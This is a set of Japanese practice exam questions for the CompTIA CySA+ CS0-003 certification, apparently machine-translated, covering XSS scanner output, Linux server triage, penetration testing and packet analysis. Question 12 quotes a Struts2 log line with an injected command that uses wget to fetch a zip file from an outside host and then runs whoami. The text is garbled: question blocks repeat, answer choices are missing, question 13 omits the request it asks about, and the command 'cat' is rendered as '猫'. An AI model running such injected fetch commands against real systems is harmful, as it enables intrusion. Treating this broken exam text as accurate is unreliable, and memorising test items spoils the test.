CS0-003 試験問題 11
セキュリティ アナリストは最近、Arachni を使用して、新しく開発された Web アプリケーションの脆弱性評価を実行しました。アナリストは、次の出力について懸念しています。
[+] XSS: フォーム入力 'txtSearch' のアクションが https://localhost/search.aspx である
[-] XSS: レスポンス #1 を分析しています...
[-] XSS: レスポンス #2 を分析しています...
[-] XSS: レスポンス #3 を分析しています...
[+] XSS: 応答が汚染されています。脆弱性の証拠を探しています。
この脆弱性の原因として最も可能性が高いのは次のどれですか?
[+] XSS: フォーム入力 'txtSearch' のアクションが https://localhost/search.aspx である
[-] XSS: レスポンス #1 を分析しています...
[-] XSS: レスポンス #2 を分析しています...
[-] XSS: レスポンス #3 を分析しています...
[+] XSS: 応答が汚染されています。脆弱性の証拠を探しています。
この脆弱性の原因として最も可能性が高いのは次のどれですか?
CS0-003 試験問題 12
インシデント対応チームのメンバーが Linux サーバーをトリアージしています。出力は以下のとおりです。
$ 猫 /etc/passwd
ルート:x:0:0::/:/bin/zsh
bin : x : 1 : 1 : : / : / usr / bin / nlogin
デーモン : x : 2 : 2 : : / : / usr / bin / nologin
メール:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
誰も:x:65534:65534:誰も:/:/usr/bin/nologin
git:x:972:972:gitデーモン ユーザー:/:/usr/bin/git-shell
$ cat /var/log/httpd
org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 警告 [struts2.dispatcher.multipart.JakartaMultipartRequest] リクエスト container.getlnstance を解析できません。(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が高いのは次のうちどれですか?
$ 猫 /etc/passwd
ルート:x:0:0::/:/bin/zsh
bin : x : 1 : 1 : : / : / usr / bin / nlogin
デーモン : x : 2 : 2 : : / : / usr / bin / nologin
メール:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
誰も:x:65534:65534:誰も:/:/usr/bin/nologin
git:x:972:972:gitデーモン ユーザー:/:/usr/bin/git-shell
$ cat /var/log/httpd
org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 警告 [struts2.dispatcher.multipart.JakartaMultipartRequest] リクエスト container.getlnstance を解析できません。(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が高いのは次のうちどれですか?
CS0-003 試験問題 13
侵入テスターは、組織のソフトウェア開発 Web サイトでテストを実施しています。侵入テスターは、Web インターフェイスに次の要求を送信します。
次のエクスプロイトのうち、最も試みられる可能性が高いのはどれですか?
次のエクスプロイトのうち、最も試みられる可能性が高いのはどれですか?
CS0-003 試験問題 14
サイバー犯罪者が使用する TTP について詳しく知るために使用できるのは次のうちどれですか?
CS0-003 試験問題 15
セキュリティ アナリストは、潜在的に侵害されたマシンからの FTP セッションを含むパケット キャプチャを Wireshark で確認しています。アナリストは、次の表示フィルターを設定します: ftp。アナリストは、226 Transfer complete 応答を含む RETR 要求がいくつかあることを確認できますが、パケット リスト ペインにはファイル転送自体を含むパケットが表示されません。アナリストがダウンロードしたファイルの内容全体を確認するには、次のどれを実行すればよいですか。